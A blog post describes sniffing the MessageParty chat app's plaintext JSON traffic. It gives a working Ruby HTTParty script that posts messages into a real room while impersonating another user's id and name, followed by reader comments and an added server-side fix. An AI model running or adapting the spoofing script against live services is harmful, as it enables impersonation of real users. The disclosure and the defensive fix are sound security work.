Hacking MessageParty with HTTParty

From Mashable: “MessageParty, an early-stage YCombinator-funded startup, takes the classic concept of a chat room and adds a geosocial twist by making any chat room location-aware.” Here’s the TechCrunch link.

Not a new idea. But the app is actually pretty cool in its simplicity (though still rough around the edges), and I found the video absolutely hilarious, and it illustrates the new world we live in:

Ok cool… hacking time now. I’ve been really interested in real-time mobile stuff lately, so I was curious about how this service works. Enter Wireshark (formerly Ethereal), a packet sniffer. So I connected my iPhone to WiFi and started looking around… they pass around the messages via plaintext HTTP in JSON payloads… looks like the client polls the server with a GET every few seconds. Simple enough… Ok let’s set up a filter “http && ip.addr == 184.106.229.49” (that’s their server’s IP) and take a better look:

Simple enough… they’ve got some kind of Ruby app up behind the scenes, the client GETs /rooms/:id/roommessages.json to get the new messages, and POSTs to /roommessages.json for outgoing messages. The JSON payload just basically has your profile pic URL, your user_id, the room_id and the message you want to send.

Let’s continue the MessageParty with HTTParty!

    require 'rubygems'
    require 'httparty'
    require 'json'

    class Party
      include HTTParty
      base_uri 'messageparty.net'

      # Posts a message to a room, mimicking the request the iPhone client sends.
      def post(room, message)
        # Headers copied from the captured client traffic.
        headers = {
          "User-Agent" => "MessageParty/1.0 CFNetwork/485.2 Darwin/10.3.1",
          "Content-Type" => "application/json",
          "Accept" => "application/json",
          "Accept-Language" => "en-us"
        }

        # Every identity field (user_id, displayname, imgurl) is supplied by the client.
        body = {
          "roommessage" => {
            "room_id" => "#{room}",
            "imgurl" => "http://www.digyourowngrave.com/content/antoine_dodson.jpg",
            "text" => message,
            "user_id" => "1130",
            "displayname" => "Antoine D"
          }
        }

        options = { :body => body.to_json, :headers => headers }
        response = self.class.post('/roommessages.json', options)
        puts response.inspect
      end
    end

    Party.new.post(1083, "You don't have to come, and confess, we looking for you")

Fake the headers, fake the JSON payload, cuz they be faking everybody out there … and voila…

I don’t mean to be an ass, but this just ain’t gonna fly… I didn’t check if they rate limit, but you can pretty much spoof anything in there… I know it’s a very early version, but come on guys… you got YC funding and tons of press.. surely you could have done better for the first version?
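The server-side fix for the spoofing described above, as an added example that is not part of the original post or MessageParty's code: a handler that takes identity from the request body next to one that derives it from a verified session token. The token format, secret, user table and function names are all assumptions made for illustration, and this complements rather than replaces serving the API over HTTPS.

```ruby
require 'openssl'
require 'json'

# All values below are constructed for this example.
SECRET = 'constructed-demo-secret'
USERS = {
  2001 => { 'displayname' => 'Real Sender', 'imgurl' => 'https://example.invalid/2001.jpg' },
  1130 => { 'displayname' => 'Someone Else', 'imgurl' => 'https://example.invalid/1130.jpg' }
}.freeze
UNAUTHORIZED = { 'error' => 'unauthorized' }.freeze

def mac_for(user_id)
  OpenSSL::HMAC.hexdigest('SHA256', SECRET, user_id.to_s)
end

# Hypothetical token handed out at login: "<user_id>.<hex HMAC of user_id>".
def issue_token(user_id)
  "#{user_id}.#{mac_for(user_id)}"
end

# Constant-time comparison so the MAC check does not leak a prefix match.
def secure_equal?(a, b)
  return false unless a.bytesize == b.bytesize
  a.bytes.zip(b.bytes).reduce(0) { |acc, (x, y)| acc | (x ^ y) }.zero?
end

# Returns the authenticated user id, or nil when the token does not verify.
def authenticate(token)
  id, mac = token.to_s.split('.', 2)
  return nil unless id && mac && secure_equal?(mac, mac_for(id))
  Integer(id, exception: false)
end

# Pattern the post describes: identity fields are accepted from the request body.
def message_trusting_client(body_json)
  JSON.parse(body_json).fetch('roommessage')
end

# Hardened: the client supplies only room and text; identity comes from the token.
def message_from_session(token, body_json)
  user_id = authenticate(token)
  profile = USERS[user_id]
  return UNAUTHORIZED unless profile
  msg = JSON.parse(body_json).fetch('roommessage', {})
  { 'room_id' => msg['room_id'].to_s, 'text' => msg['text'].to_s[0, 500],
    'user_id' => user_id }.merge(profile)
end

# Constructed request: the body claims user 1130, the token belongs to user 2001.
SPOOFED_BODY = { 'roommessage' => { 'room_id' => '1083', 'text' => 'hi', 'user_id' => '1130',
                                    'displayname' => 'Someone Else' } }.to_json
```

With the hardened handler, the `user_id`, `displayname` and `imgurl` in the stored message always belong to the token's owner, whatever the body claims.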

  • AP

    Hey Andre – Amanda here, founder of MessageParty. Thank you so much for this post – we’ve been working non-stop trying to make the app better and I appreciate that you took the time to point this out – app updates coming soon!

    Amanda

  • Anonymous

    Something you can try right away in 10 minutes is simply set up a certificate on the domain, and put a redirect from http to https. The iPhone *might* pick it up fine, and that way you won’t have prying eyes like mine looking at how to spoof things..

    Doing what I’m doing is fine, since hopefully you guys would have an API at some point, but the authentication and security checks should be stronger…

    As far as the app goes, please don’t block the UI by doing network requests in the main thread… the app freezes each time it updates for new messages.

    Good luck!

  • Andrew Hart

    Is MessageParty still active? I created essentially the same thing without even realising it had been done before. It’s currently in beta for iPhone – http://geolocha.com/